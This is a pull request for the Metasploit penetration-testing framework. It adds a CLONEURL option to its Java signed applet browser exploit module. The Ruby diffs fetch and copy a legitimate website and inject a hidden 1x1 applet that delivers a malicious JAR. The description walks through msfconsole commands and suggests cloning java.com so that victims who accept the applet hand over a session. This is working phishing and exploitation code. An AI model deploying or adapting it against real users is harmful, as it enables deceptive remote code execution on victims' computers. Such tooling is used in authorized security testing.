### PR TITLE
Adds a CLONEURL option to the Java Signed Applet module

### DIFF
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def setup
 		load_cert
 		load_applet_class
+		body_content
 		super
 	end
 
@@ -231,40 +232,46 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def default_html
+	def default_body_content
 		%Q|<html><head><title>Loading, Please Wait...</title></head>
 		    <body><center><p>Loading, Please Wait...</p></center>
 		    </body>
 		   </html>|
 	end
 
-	def applet_html
-		%Q|<applet archive="#{get_resource.sub(/\/$/, '')}/#{datastore["APPLETNAME"]}.jar"
+	def applet_tag
+		base_url = "http://#{srvhost_addr}:#{datastore['SRVPORT']}#{get_resource}"
+		%Q|<applet archive="#{base_url.sub(/\/$/, '')}/#{datastore["APPLETNAME"]}.jar"
 		     code="#{datastore["APPLETNAME"]}" width="1" height="1">
 		   </applet>|
 	end
 
 	# If specified, fetches, caches, and returns the HTML served at CLONEURL
-	# Otherwise returns the default_html return value
-	def fetch_html_content
+	# Otherwise returns the default_body_content return value
+	def body_content
 		clone_url = datastore['CLONEURL']
-		@html_content ||= if clone_url.present?
+		@body_content ||= if clone_url.present?
 			print_status "Cloning contents of URL #{clone_url}..."
 			begin
-				io = open(clone_url)
-				html = rewrite_urls(io.read)
-				io.close
-				html
+				fetch_cloned_content(clone_url)
 			rescue URI::InvalidURIError => e
 				print_error("Invalid CLONEURL: #{clone_url}. Using default HTML.")
-				default_html
+				default_body_content
 			end
 		else
-			default_html
+			default_body_content
 		end
 	end
 
-	# updates any elements in the html parameter to be absolute
+	# grabs the HTML content of the CLONEURL datastore option
+	def fetch_cloned_content(clone_url)
+		io = open(clone_url)
+		html = io.read
+		io.close
+		rewrite_urls(html)
+	end
+
+	# updates any elements in the document to use absolute paths
 	def rewrite_urls(html)
 		print_status 'Rewriting relative URLs in cloned HTML...'
 		doc = Nokogiri::HTML(html)
@@ -280,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def generate_html
 		# inject the applet HTML tag into the page we are rendering
-		@generated_html ||= fetch_html_content.sub(/(<\/body>|<\/html>|\Z)/imx, applet_html+'\1')
+		body_content.sub(/(<\/body>|<\/html>|\Z)/imx, applet_tag+'\1')
 	end
 
 	# Currently unused until we ship a java compiler of some sort

--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -249,8 +249,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	# If specified, fetches, caches, and returns the HTML served at CLONEURL
 	# Otherwise returns the default_body_content return value
 	def body_content
-		clone_url = datastore['CLONEURL']
-		@body_content ||= if clone_url.present?
+		@body_content ||= if datastore['CLONEURL'].present?
+			clone_url = datastore['CLONEURL']
 			print_status "Cloning contents of URL #{clone_url}..."
 			begin
 				fetch_cloned_content(clone_url)

--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -8,6 +8,7 @@
 require 'msf/core'
 require 'rex'
 require 'rex/zip'
+require 'open-uri'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
@@ -37,7 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				with full user permissions.
 			},
 			'License'       => MSF_LICENSE,
-			'Author'        => [ 'natron' ],
+			'Author'        => [ 'natron', # original module
+			                     'joev <jvennix[at]rapid7.com>' ],  # added CLONEURL support
 			'References'    =>
 				[
 					[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
@@ -92,6 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				"The main applet's class name.",
 				"SiteLoader"
 				]),
+			OptString.new('CLONEURL', [ false,
+				"If specified, displays the contents of the given URL instead of a Loading... message"
+				]),
 			OptPath.new('SigningCert', [ false,
 				"Path to a signing certificate in PEM or PKCS12 (.pfx) format"
 				]),
@@ -111,11 +116,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		super
 	end
 
-
 	def on_request_uri( cli, request )
 		if not request.uri.match(/\.jar$/i)
 			if not request.uri.match(/\/$/)
-				send_redirect( cli, get_resource() + '/', '')
+				send_redirect( cli, get_resource + '/', '')
 				return
 			end
 
@@ -227,20 +231,57 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def generate_html
-		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
-		html << %Q|<body><center><p>Loading, Please Wait...</p></center>\n|
-		html << %Q|<applet archive="#{get_resource.sub(%r|/$|, '')}/#{datastore["APPLETNAME"]}.jar"\n|
-		vprint_line(html)
-		if @use_static
-			html << %Q|  code="SiteLoader" width="1" height="1">\n|
-		else
-			html << %Q|  code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
-		end
-		html << %Q|</applet>\n</body></html>|
-		return html
+	def default_html
+		%Q|<html><head><title>Loading, Please Wait...</title></head>
+		    <body><center><p>Loading, Please Wait...</p></center>
+		    </body>
+		   </html>|
 	end
 
+	def applet_html
+		%Q|<applet archive="#{get_resource.sub(/\/$/, '')}/#{datastore["APPLETNAME"]}.jar"
+		     code="#{datastore["APPLETNAME"]}" width="1" height="1">
+		   </applet>|
+	end
+
+	# If specified, fetches, caches, and returns the HTML served at CLONEURL
+	# Otherwise returns the default_html return value
+	def fetch_html_content
+		clone_url = datastore['CLONEURL']
+		@html_content ||= if clone_url.present?
+			print_status "Cloning contents of URL #{clone_url}..."
+			begin
+				io = open(clone_url)
+				html = rewrite_urls(io.read)
+				io.close
+				html
+			rescue URI::InvalidURIError => e
+				print_error("Invalid CLONEURL: #{clone_url}. Using default HTML.")
+				default_html
+			end
+		else
+			default_html
+		end
+	end
+
+	# updates any elements in the html parameter to be absolute
+	def rewrite_urls(html)
+		print_status 'Rewriting relative URLs in cloned HTML...'
+		doc = Nokogiri::HTML(html)
+		%w(href src data).each do |attr_name|
+			doc.css("[#{attr_name}]").each do |el|
+				# rewrite URL if not absolute
+				src = el.attributes[attr_name]
+				el.set_attribute(attr_name, URI.join(datastore['CLONEURL'], src))
+			end
+		end
+		doc.to_html
+	end
+
+	def generate_html
+		# inject the applet HTML tag into the page we are rendering
+		@generated_html ||= fetch_html_content.sub(/(<\/body>|<\/html>|\Z)/imx, applet_html+'\1')
+	end
 
 	# Currently unused until we ship a java compiler of some sort
 	def applet_code


### PR DESCRIPTION
This allows a user to "clone" an external website and display it on the page that runs the applet.
### Verify no regressions
- [ ] Launch msfconsole, use the JSA module with default options and "Automatic" target
  
  ```
  $ ./msfconsole
  msf > use exploit/multi/browser/java_signed_applet
  msf > set URIPATH /lolz
  msf > set target 0
  msf > exploit
  ```
- [ ] From a browser with Java applets enabled (heh), visit the URL that appears in the console output. Click Accept and run the applet.
- [ ] You should get a session
### Verify new behavior
- [ ] Now reconfigure the module to use the CLONEURL option. You can give it any URL to clone, but static pages without much JS will work the best (sometimes JS-heavy sites will include assets with SOP requirements, which will fail here since we are hosting from our own IP address).
  
  ```
  msf > set CLONEURL http://java.com/en/download/index.jsp
  msf > set URIPATH /lolz2
  msf > rexploit
  ```
- [ ] Using the same browser as last time, visit the URL that appears in the console output. The page displayed should look like the legitimate website served by CLONEURL
- [ ] Click accept and you should get a session
### Notes on my changes:
1. I removed the @use_static check on line 235, as it did not seem to be doing anything. Grepping framework for "use_static" yielded no results, so I killed it.
